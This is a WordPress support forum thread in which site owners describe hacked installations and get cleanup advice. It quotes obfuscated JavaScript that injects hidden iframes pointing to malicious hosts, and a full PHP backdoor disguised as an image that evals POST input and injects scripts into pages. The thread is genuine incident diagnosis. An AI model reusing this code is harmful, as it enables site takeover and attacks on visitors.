Forums

WordPress › Support » How-To and Troubleshooting

malicious script injection on my site (12 posts)

  1. mr_swede
    Member
    Posted 3 years ago #

    For the second time in a few months I've had a malicious script injection in html and php files on my site. I don't know how it happened, but last time I changed all passwords and reinstalled all files hoping for a solution.

    All wordpress folders and files had and have 755 file permission.

    Below are the scripts injected in the wordpress files. According to my hosting partner (one.com) someone got hold of my passwords, but I've seen that files been injected after I changed password to my site. I did not change the password to my wp-admin account last time since I didn't suspect this to be a wordpress break in, but now I don't know anymore...

      Anyone that can decipher them? I've googled but haven't found a way to do it.
      I also would like someone to advice me what has happened and what to do to avoid this from happening again.

    wp-includes\class-smtp.php
    <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6B756E2D6C616E642E68752F63642F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

    wp-includes\post.php
    <script> var s='3C696672616D65207372633D22687474703A2F2F6C657A68756E7465722E636F6D2F73742F6373732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

    wp-includes\query.php
    <script> var s='3C696672616D65207372633D22687474703A2F2F7777772E706F726E67616C6C65726965737A2E636F6D2F73742F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

    wp-includes\feed-rss2-comments.php
    <script> var s='3C696672616D65207372633D22687474703A2F2F6C657A68756E7465722E636F6D2F73742F6373732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

  2. mr_swede
    Member
    Posted 3 years ago #

    After some more googling I finally found out how to decipher the scripts above. I'm a totally newbie to scripts, so bear with me if my how-to isn't nerdy enough...

    Just replace all document.write(txt) with document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>");

    Thanks to the original author.

    Then save the file as .html and run it in your browser. Make sure that scripts are allowed. Having changed the scripts according to the advice above make the scripts totally harmless, so you can load the file in IE. I failed to load them in Firefox.

    Now, the scripts above look like this after deciphering:

    class-smtp.html

    This is how the first script looks like after making the change described above...just so that you see the change of document.write.

    <html>
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6B756E2D6C616E642E68752F63642F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);  o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write("<textarea rows=50 cols=50>");document.write(unescape(o));document.write("</textarea>")}</script>
</html>

    How it looks like in IE
    <iframe src="http://www.kun-land.hu/cd/z/static.php" height="2" style="display:none" width="2"></iframe>

    post.html
    This is the iframe hidden in the script.
    <iframe src="http://lezhunter.com/st/css/z/static.php" height="2" style="display:none" width="2"></iframe>

    query.html

    IE result:
    <iframe src="http://www.porngalleriesz.com/st/z/static.php" height="2" style="display:none" width="2"></iframe>

    feed-rss2-comments.html

    IE result:
    <iframe src="http://lezhunter.com/st/css/z/static.php" height="2" style="display:none" width="2"></iframe>

    I still really need to know how all this happened to me. Anyone out there than can shed some light on this?

    I removed all the files above from my site since I faced google blacklisting last time this happened. However, now I can't access my site and login as wp-admin. Anyone who can suggest me how to get back in so that I can upgrade without having to delete everything?

  3. whooami
    Member
    Posted 3 years ago #

    All wordpress folders and files had and have 755 file permission.

    judging by this admission, it could be anything.

    not to mention that you didnt mention the version of wordpress this site is running, but you do mention needing to upgrade.

    I suggest reading through the forum, search for hacked.

  4. mr_swede
    Member
    Posted 3 years ago #

    judging by this admission, it could be anything.

    This was just about what my hosting partner one.com told me as well. The problem is that I don't know what has happened and I therefor don't know what to do to avoid this again.

    I'm using version 2.6, and I already have searched the forums - both here and elsewhere - without having found someone else addressing these issues.

  5. whooami
    Member
    Posted 3 years ago #

    well 2.6 is insecure. theres your next problem.

    thats why there's a message that tells you in your admin area to upgrade.

    and these issues are addressed, over and over and over on these forums.

    you want a specific answer based on the content of the files, thats probably not going to happen. An insecure site can be the victim to all sorts of malicious files of varying content.

    Ive also, time and time again, explained the right way to clean out a site. if you searched for the word 'hacked' on these forums, chances are you've seen my other posts.

    The result of NOT cleaning a site out properly, and the importance of doing things right the first time, was demonstrated just this evening, within this thread:

    http://wordpress.org/support/topic/206175?replies=20

    10 months .. and that file stayed on this guy's server.

  6. mr_swede
    Member
    Posted 3 years ago #

    and these issues are addressed, over and over and over on these forums.

    Thanks for your patience - I've read many of your answers and I'm impressed by your way of dealing with people like me over and over again.

    One problem of not being a pro is that it's difficult to see patterns when other people address related issues. I - of course stupidly - thought that my issues are unique, which they of course aren't.

    A funny - and scary - thing is that I just logged on to my site, changed all passwords and literally saw files being changed as I was logged on. More scripts were inserted into other wp files.

    I will read through the forums again, change passwords once again, upgrade and hope for the best.

  7. whooami
    Member
    Posted 3 years ago #

    Thanks for your patience

    no worries. it's actually in my best interest to help -- im not that altruistic :) hacked websites are bad for all of us.

    what you really have to do is shitcan a good deal of whats on your server, file-wise. if youre uploading files from the admin area, scour all of those directories, for ANYTHING that doesnt look right --

    an image file that has executable permissions, for example.

    anything you dont remember uploading...

    if need be, download everything, and look at it.

    the other thing, is to look in your database. I fixed a site over the weekend -- the owner didnt even know that the site had had a malicious file uploaded to it. I saw it in the posts table; it was an untitled post, with one attachment.. and the attachment was a malicious script that's been mentioned on this forum by name.

    also, while in your database look for any rogue users, in the users table. wordpress <-- you shouldnt have that user.

    the rest is really a matter of cleaning up the filespace, deleting anything you cannot confirm is clean, and starting with fresh files.

    I tell people, when they upgrade that they ought to be deleting files first, and the "leaving old files on the server" problem is one reason why.

    lastly, of course, change your passwords. all of them.

    oh, and fix those permissions. :P

  8. PatriotG
    Member
    Posted 3 years ago #

    Hello

    We currently Run 2.6.2 on our site and it was recently hacked. My host said that it was a php Injection attack.

    Not sure if this is the case, I have to assume for now that this is the truth.

    We do not run wp-super-cache oplugin, so this was not the vulnerability.

    The initial issue started as follows:

    When you went to the site the main page threw an error similar to this:
    Parse error: syntax error, unexpected '<' in /hsphere/local/home/rfreeman/examplesite.com/wp-includes/post-template.php on line 734

    Our host I assume cleaned up the directory.

    When the site was finally back up I found this in the plugin page notice area

    The plugin

    ../../../../../../../../../../../../../../../../../../../../../hsphere/local/home/atomic/atomiccityfourwheelers.com/forum/images/smilies/156.gif has been deactivated due to an error: Invalid plugin.

    No idea what this is., and I cant seem to get rid of it.

    Also

    when i went to the main page,
    Symantec antivirus generated a threat alert for the Bloodhound.exploit.196
    http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2008-080702-2357-99

    I posting this as a warning to others, and also was wondering if anyone here experienced similar problems.

    At this point we are thinking about doing a fresh install of 2.6.3, but im wondering if the vulnerability lies elsewhere, plugins, or directory permissions.

    Any response will be apprciated.

  9. whooami
    Member
    Posted 3 years ago #

    http://atomiccityfourwheelers.com/forum/images/smilies/156.gif

    thats not an image.

    its this:

    <?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

    contact your host, if thats not a domain you have control over. clean up your site, etc, etc ..

  10. whooami
    Member
    Posted 3 years ago #

    fwiw, that looks for other stuff to be 'in place' so if youre seeing an effect from that, chances are you have files in place on your server that have been altered.

    and dont rely on your host to clean up your site, thats not their job, and most dont have a clue what to look for or do. I say that as someone who works for a host.

  11. PatriotG
    Member
    Posted 3 years ago #

    Thanks.

    Our host went in there and started the cleanup on their own.
    We are going to do a fresh install of 2.6.3

    We are running the XDFORUM plugin, and that is still not functioning properly.

    My hope with this post was hopefully t find where the vulnerabilty was, in a plugin or other,
    But thanks for the insight.
    PG

  12. whooami
    Member
    Posted 3 years ago #

    ok, well here's the deal though (6 hours later)..

    your host went and cleaned up what -- that image, thats not an image .. thats still there. so your host, they either need that info, or you need a new host.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags